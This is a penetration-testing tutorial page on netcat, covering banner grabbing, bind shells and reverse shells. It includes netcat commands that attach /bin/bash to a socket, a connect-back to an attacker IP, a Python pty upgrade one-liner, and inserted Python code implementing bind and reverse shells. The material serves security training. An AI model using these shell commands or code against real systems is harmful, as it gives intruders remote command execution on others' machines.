Tool introduction: netcat

Now that we are able to identify open ports and accessible services on a target system, we can also communicate with them. In most cases a dedicated client already exists for this purpose. Take TCP port 22, for instance: it is registered with IANA (Internet Assigned Numbers Authority) for SSH, and on Debian the openssh-client package provides the matching tools, ssh and scp among them. It should be noted that these port assignments are only a convention; nobody is obliged to run the corresponding service on its registered port, or to keep that port free for it. The flip side is that an SSH server may just as well be reachable on any other port, as the example below shows.

But how do we communicate with a service that is not known to us, and how do we identify what is running on a port in the first place? Enter netcat (nc), a tool that transports standard input and output over network connections. As we will see below, it lives up to its reputation as a Swiss Army Knife. Netcat has two basic modes of operation: it can act as a server (listener) or as a client, as the following command lines show. Note that several implementations exist (on Debian: netcat-traditional, netcat-openbsd and Nmap's ncat) whose option syntax differs slightly; the examples in this section use the traditional variant.

  • Server: nc -l -p ${port}
  • Client: nc ${target server} ${target port}

Knowing this, the simplest approach is to connect to each open port with netcat and see what the server sends. In this example, netcat connects to the target system 10.250.53.33 on TCP port 1035. The port answers with SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3, the software banner of the service: an SSH server on a non-standard port.

~$ nc 10.250.53.33 1035 
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

So with netcat we can connect to any TCP service and learn about the service and its version from what the server sends back. This technique is called banner grabbing. Note, however, that not every server speaks first: many protocols (HTTP, for instance) wait for the client to send something, so a silent port is not necessarily a closed or dead one. Netcat can also send and receive UDP datagrams (option -u); see the manpage (→ man nc) for details.
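To make the banner-grabbing behaviour concrete, here is an added example in Python (it is not part of the original binsec material and not a netcat feature) that does by hand what the nc call above does: connect, wait a bounded time for the server to speak, and optionally send a probe for services that only answer after the client. The throw-away loopback listener that feeds it constructed banners, the timeouts and the HTTP probe are assumptions for the demonstration; the sample banner is modelled on the one shown above, not captured from a real host.

```python
import socket
import threading

# Constructed sample banner, modelled on the output shown above (not captured
# from a real host).
SAMPLE_BANNER = b"SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3\r\n"


def grab_banner(host, port, timeout=3.0, probe=None, max_bytes=1024):
    """Connect to host:port over TCP and return the first data the server sends.

    Returns the decoded banner; "" if the server closed the connection without
    sending anything (an access control list, for example); None if it stayed
    silent until `timeout` elapsed. Services that only speak after the client
    (HTTP, for instance) can be coaxed with `probe`.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            data = s.recv(max_bytes)
        except socket.timeout:
            return None
    if not data:
        return ""
    return data.decode("utf-8", errors="replace").strip()


def grab_banners(host, ports, **kwargs):
    """Banner-grab a list of ports; a refused connection is recorded as an error."""
    results = {}
    for port in ports:
        try:
            results[port] = grab_banner(host, port, **kwargs)
        except OSError as exc:
            results[port] = f"error: {exc.strerror or exc}"
    return results


def serve_once(banner, after_probe=False, host="127.0.0.1"):
    """Throw-away loopback listener used as a stand-in for a real target.

    Serves exactly one client: sends `banner` immediately, or, if `after_probe`
    is set, only after the client has sent something (like an HTTP server).
    An empty banner simulates a server that never speaks first.
    Returns the port it listens on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            try:
                if after_probe and not conn.recv(1024):
                    return  # client gave up without sending a probe
                if banner:
                    conn.sendall(banner)
                conn.recv(1)  # keep the connection open until the client hangs up
            except OSError:
                pass

    threading.Thread(target=handle, daemon=True).start()
    return port


if __name__ == "__main__":
    chatty = serve_once(SAMPLE_BANNER)
    silent = serve_once(b"")
    web = serve_once(b"HTTP/1.0 400 Bad Request\r\n", after_probe=True)
    print(grab_banners("127.0.0.1", [chatty, silent], timeout=1.0))
    print(grab_banner("127.0.0.1", web, timeout=1.0, probe=b"HEAD / HTTP/1.0\r\n\r\n"))
```

The three return values matter in practice: a banner identifies the software, an immediate close often means an access list or TCP wrapper rejected us, and a timeout means the service is waiting for us to speak first, which is the case to retry with a protocol-specific probe rather than to write the port off.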

With netcat we can not only connect to services but also transmit the input and output of a local program over the network. Why is this of interest to us as attackers? Remember our objective: the complete takeover or compromise of the target system. And what local program could give us more control over a system than a shell? So if we are able to execute a command through a previously identified vulnerability, netcat can provide us with a so-called bind shell or reverse shell.

As the name suggests, for a bind shell we open (bind) a listening port on the target system and attach the input and output of a shell, e.g. bash, to it; this is what the -e option does in the example below. To execute commands, all we then have to do is connect from our attacker machine to that port. Note that -e exists in netcat-traditional and in ncat but not in netcat-openbsd, which deliberately omits it; on such targets the same effect has to be achieved differently, for instance with a named pipe (mkfifo) or with an interpreter that is installed on the target.

Attacker:

~$ nc 10.250.53.33 4444 
id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Target system:

www-data@otrs:~$ nc -lvp 4444 -e /bin/bash 
listening on [any] 4444 ... 
10.20.1.14: inverse host lookup failed: Host name lookup failure 
connect to [10.250.53.33] from (UNKNOWN) [10.20.1.14] 59252

Unlike a bind shell, with a reverse shell we open a listening port on our attacker machine and then, in a second step, have the target system connect back to us; the I/O of the shell is again attached to that socket. A reverse shell is often the more practical choice: it only needs an outbound connection from the target, which firewalls and NAT usually allow, whereas a bind shell requires the target's port to be reachable from the attacker. Once the connection is established, we send commands as before:

Attacker:

~$ nc -lvp 4444 
listening on [any] 4444 ... 
10.250.53.33: inverse host lookup failed: Unknown host 
connect to [10.20.1.14] from (UNKNOWN) [10.250.53.33] 59805 
id 
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Target system:

www-data@otrs:~$ nc 10.20.1.14 4444 -e /bin/bash
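What nc -e does in both sessions above, a socket wired to a shell, can be spelled out in a few lines of Python. The following is an added example (not from the binsec material and not netcat itself) that shows the bind and the reverse form side by side: both end in the same attach_shell function, the only difference being who connects to whom. It re-enacts the whole exchange on the loopback interface so it can be tried without a second machine; the shell path /bin/sh, the loopback addresses, the echo commands and the end-of-output marker are assumptions for the demonstration.

```python
import socket
import subprocess
import threading
import time

SHELL = "/bin/sh"            # assumption: a POSIX shell at this path (the page uses /bin/bash)
END_MARKER = "__END_OF_OUTPUT__"


def attach_shell(conn, shell=SHELL):
    """The heart of `nc -e`: start `shell` with stdin, stdout and stderr
    pointing at the connected socket, and wait until it exits."""
    fd = conn.fileno()
    proc = subprocess.Popen([shell], stdin=fd, stdout=fd, stderr=fd)
    return proc.wait()


def bind_shell(port, host="0.0.0.0"):
    """Target side of a bind shell: listen, accept one client, hand it a shell."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            return attach_shell(conn)


def reverse_shell(host, port):
    """Target side of a reverse shell: connect out to the attacker's listener."""
    with socket.create_connection((host, port)) as conn:
        return attach_shell(conn)


def run_remote(conn, cmd, timeout=10.0):
    """Attacker side: send one command line and collect its output.

    The shell at the other end prints no prompt and gives no end-of-output
    signal, so a marker is echoed after the command to know when to stop reading.
    """
    conn.settimeout(timeout)
    conn.sendall(f"{cmd}; echo {END_MARKER}\n".encode())
    buf = b""
    while END_MARKER.encode() not in buf:
        chunk = conn.recv(4096)
        if not chunk:          # shell exited / connection closed
            break
        buf += chunk
    return buf.decode(errors="replace").split(END_MARKER, 1)[0].strip()


def demo_bind_shell(cmd="echo bind-shell-ok"):
    """Loopback re-enactment of the bind-shell session: 'target' listens,
    'attacker' connects and runs `cmd`. Returns the command output."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind(("127.0.0.1", 0))
        port = tmp.getsockname()[1]   # pick a free port for the demo
    threading.Thread(target=bind_shell, args=(port, "127.0.0.1"), daemon=True).start()
    for _ in range(50):                # wait for the listener to come up
        try:
            conn = socket.create_connection(("127.0.0.1", port), timeout=1.0)
            break
        except OSError:
            time.sleep(0.1)
    else:
        raise RuntimeError("bind shell did not start listening")
    with conn:
        out = run_remote(conn, cmd)
        conn.sendall(b"exit\n")        # let the remote shell terminate cleanly
    return out


def demo_reverse_shell(cmd="echo reverse-shell-ok"):
    """Loopback re-enactment of the reverse-shell session: 'attacker' listens,
    'target' connects back. Returns the command output."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port = srv.getsockname()[1]
        threading.Thread(target=reverse_shell, args=("127.0.0.1", port), daemon=True).start()
        srv.settimeout(5.0)
        conn, _ = srv.accept()
        with conn:
            out = run_remote(conn, cmd)
            conn.sendall(b"exit\n")
    return out


if __name__ == "__main__":
    print(demo_bind_shell("id"))
    print(demo_reverse_shell("id"))
```

Two things the loopback version makes visible: the shell has no terminal attached (its three standard file descriptors are a socket), which is exactly why the session is not interactive, and the attacker side has to invent its own end-of-output convention because a shell on a plain socket gives no prompt to synchronise on.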


Interactive reverse shell during netcat session with Python

A reverse shell obtained with netcat is not interactive: the shell has no pseudo-terminal (tty) attached, so programs that need one, such as sudo, su or mysql, fail or work only to a limited extent, there is no line editing or tab completion, and Ctrl-C kills the whole session instead of the running program. If Python is installed on the target computer, a pseudo-terminal can easily be spawned within the netcat session:

python -c 'import pty; pty.spawn("/bin/bash")'

To make the shell fully usable afterwards, suspend the session with Ctrl-Z, run stty raw -echo followed by fg on the attacker side, and set TERM (for example to xterm) in the remote shell so that terminal-aware programs work.

binsec academy GmbH – Advanced Pentest Training Lab

binsec academy GmbH operates the Pentest Training Lab, a highly practical online platform dedicated to real penetration testing. Simulating complex corporate networks and advanced real-world attack scenarios within isolated lab environments, it is engineered to sharpen the skills of aspiring and professional penetration testers. Upon conquering our rigorous, fully practical examination, participants earn the distinguished Binsec Academy Certified Pentest Professional (BACPP) designation — proving their technical capability to methodically uncover and evaluate vulnerabilities in modern IT infrastructures.

Explore the Pentest Training Lab

binsec GmbH – Experts in Penetration Testing

As the operative pentesting core of the binsec group, binsec GmbH has provided high-end, human-led penetration testing since 2013. Rejecting automated scans, our permanently employed, certified senior pentest experts deliver manual deep-dive assessments of web applications, APIs, mobile apps, complex network infrastructures, cloud environments, and advanced red team simulations. Specializing in high-regulation sectors like Payment, Banking, and Healthcare, we provide clear risk evaluations and actionable reports to effectively assess your business-critical systems.

Get Manual Expert Penetration Testing Services

Contact

binsec GmbH
Clemensstraße 6-8
60487 Frankfurt am Main
Germany

Legal notice

Director: Patrick Sauer
Authorized Officer: Dominik Sauer, Florian Zavatzki
Registration: Frankfurt am Main, HRB97277
Turnover Tax Identification No.: DE290966808